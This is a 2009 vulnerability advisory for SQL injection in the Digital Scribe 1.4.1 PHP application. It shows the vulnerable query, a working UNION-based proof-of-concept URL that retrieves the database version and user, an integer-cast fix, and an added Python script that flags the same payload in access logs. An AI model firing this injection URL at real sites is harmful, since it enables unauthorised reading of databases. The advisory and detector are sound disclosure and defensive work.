Digital Scribe 1.4.1 Multiple SQL Injection Vulnerabilities

Name              Digital Scribe
Vendor            http://www.digital-scribe.org
Versions Affected 1.4.1

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-11


X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX
VI.  DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

The Digital Scribe is a free, intuitive system designed to
help teachers put student work and homework assignments
online.


II. DESCRIPTION

This application is affected by many SQL Injection security
flaws. To exploit them, the Magic Quotes GPC setting
(php.ini) must be Off, except for one issue.

I tested version 1.4.1 only; however, other versions may
also be vulnerable.


III. ANALYSIS

Summary:

A) Multiple SQL Injection


A) Multiple SQL Injection

Multiple SQL Injection issues have been found in Digital
Scribe version 1.4.1, and no authentication is required
in order to exploit these vulnerabilities.

Most of the issues require Magic Quotes GPC to be set to
Off; one (stuworkdisplay.php) does not.
For simplicity I reported only this last vulnerable code.

Vulnerable code:

........

// The ID parameter is interpolated into the query unquoted and
// unvalidated, so Magic Quotes does not protect this statement.
$show = mysql_query("SELECT * FROM ".$conf['tbl']['projecttable']."
WHERE(ID=$HTTP_GET_VARS[ID])");

........


IV. SAMPLE CODE

http://site/path/stuworkdisplay.php?ID=-1) UNION ALL SELECT version(),user(),3,4,5,6,7,8,9,10,11%23


V. FIX

// Cast the parameter to an integer before it reaches the query.
$id = intval($_GET['ID']);
$show = mysql_query("SELECT * FROM ".$conf['tbl']['projecttable']."
WHERE(ID=$id)");


VI. DISCLOSURE TIMELINE

2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release
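A site operator can check web server access logs for requests against this parameter, since the fixed code only ever accepts a plain integer. The following is an added example and not part of the advisory: the log lines are constructed, and the /scribe/ install path and Combined Log Format are assumptions.

```python
"""Flag requests to stuworkdisplay.php whose ID parameter is not an integer."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format, not from the advisory).
# Line 2 carries the advisory's UNION payload; line 4 sends an empty ID,
# which intval() would silently turn into 0.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2009:10:00:01 +0000] "GET /scribe/stuworkdisplay.php?ID=42 HTTP/1.1" 200 1532
10.0.0.9 - - [11/Dec/2009:10:00:07 +0000] "GET /scribe/stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%20version(),user(),3,4,5,6,7,8,9,10,11%23 HTTP/1.1" 200 2210
10.0.0.9 - - [11/Dec/2009:10:00:09 +0000] "GET /scribe/index.php HTTP/1.1" 200 870
10.0.0.7 - - [11/Dec/2009:10:00:12 +0000] "GET /scribe/stuworkdisplay.php?ID= HTTP/1.1" 200 1532
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)
INT_RE = re.compile(r'^-?\d+$')   # the only shape intval() accepts losslessly
TARGET = "stuworkdisplay.php"      # vulnerable script named in the advisory


def find_suspicious_requests(log_text):
    """Return (client_ip, decoded_id) for every request to stuworkdisplay.php
    whose ID value is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed log line; skip rather than guess
        parts = urlsplit(m.group("url"))
        if parts.path.rsplit("/", 1)[-1] != TARGET:
            continue
        # parse_qs percent-decodes values, so %20 and %23 become ' ' and '#'.
        # keep_blank_values=True makes an empty ID visible instead of dropping it.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ID", []):
            if not INT_RE.match(value.strip()):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ip}: suspicious ID value {value!r}")
```

Requests that omit ID entirely are not flagged, because the fixed code turns a missing parameter into ID=0 without touching the query structure.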